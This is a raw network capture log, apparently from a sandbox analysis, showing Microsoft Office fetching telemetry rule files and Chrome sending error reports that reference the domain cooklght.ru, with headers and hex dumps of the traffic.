                                                                            2024-10-28 08:37:20 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            132192.168.2.44990513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:20 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1368
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                            ETag: "0x8DC582BDDC22447"
                                                                            x-ms-request-id: 207ff7bf-701e-006f-1357-27afc4000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-16849878b78x6gn56mgecg60qc00000006hg00000000a0h5
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:20 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            133192.168.2.44989813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:20 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1395
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                            ETag: "0x8DC582BE017CAD3"
                                                                            x-ms-request-id: cd04a713-f01e-003f-7315-26d19d000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-16849878b78qf2gleqhwczd21s000000052g000000000w3g
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:20 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            134192.168.2.44990735.190.80.14431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC532OUTOPTIONS /report/v4?s=wU86ZkLChHGwsGXE7iVMwUH4zwTrzKODgoeTBUCkRFC%2FN77LdGcTyfToJ3FFEFE08SIJJZd%2FULcl%2BAFOXmP3cxNffWx5xEW2eVvOkQofnLEj8cyoSShA5Bm799Ml%2BA%3D%3D HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Origin: https://cooklght.ru
                                                                            Access-Control-Request-Method: POST
                                                                            Access-Control-Request-Headers: content-type
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:20 UTC336INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            access-control-max-age: 86400
                                                                            access-control-allow-methods: OPTIONS, POST
                                                                            access-control-allow-origin: *
                                                                            access-control-allow-headers: content-type, content-length
                                                                            date: Mon, 28 Oct 2024 08:37:19 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            135192.168.2.44990913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1397
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                            ETag: "0x8DC582BE7262739"
                                                                            x-ms-request-id: 9cf5c506-801e-0083-443d-26f0ae000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-r197bdfb6b4bq7nf8mnywhn9e000000005r000000000a1r7
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            136192.168.2.44991113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1403
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                            ETag: "0x8DC582BDCB4853F"
                                                                            x-ms-request-id: de20d122-c01e-008e-20f7-267381000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-r197bdfb6b48v72xb403uy6hns000000056g00000000a501
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            137192.168.2.44991013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1360
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                            ETag: "0x8DC582BDDEB5124"
                                                                            x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-16849878b786lft2mu9uftf3y400000005z000000000b5vv
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            138192.168.2.44991213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:20 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1366
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                            ETag: "0x8DC582BDB779FC3"
                                                                            x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083720Z-15b8d89586fmhkw429ba5n22m8000000067g0000000014th
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            139192.168.2.44990813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:20 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:21 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1364
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                            ETag: "0x8DC582BE1223606"
                                                                            x-ms-request-id: f29ba936-801e-0047-2ef2-247265000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083721Z-17c5cb586f6gkqkwd0x1ge8t0400000005400000000022nf
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            140192.168.2.44991335.190.80.14431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:22 UTC478OUTPOST /report/v4?s=wU86ZkLChHGwsGXE7iVMwUH4zwTrzKODgoeTBUCkRFC%2FN77LdGcTyfToJ3FFEFE08SIJJZd%2FULcl%2BAFOXmP3cxNffWx5xEW2eVvOkQofnLEj8cyoSShA5Bm799Ml%2BA%3D%3D HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 417
                                                                            Content-Type: application/reports+json
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:22 UTC417OUTData Raw: 5b 7b 22 61 67 65 22 3a 39 34 33 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 39 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6f 6b 6c 67 68 74 2e 72 75 2f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 31 2e 31 34 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a
                                                                            Data Ascii: [{"age":9436,"body":{"elapsed_time":1098,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://cooklght.ru//","sampling_fraction":1.0,"server_ip":"104.21.91.145","status_code":404,"type":"http.error"},"type":"network-error","url":
                                                                            2024-10-28 08:37:22 UTC168INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            date: Mon, 28 Oct 2024 08:37:21 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            141192.168.2.44991613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:22 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC584INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:22 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1390
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                            ETag: "0x8DC582BE3002601"
                                                                            x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083722Z-16849878b7898p5f6vryaqvp5800000005r0000000000e1g
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:22 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            142192.168.2.44991813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:22 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:22 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:22 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 1401
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                            ETag: "0x8DC582BE2A9D541"
                                                                            x-ms-request-id: ee736da1-b01e-001e-7be0-260214000000
                                                                            x-ms-version: 2018-03-28
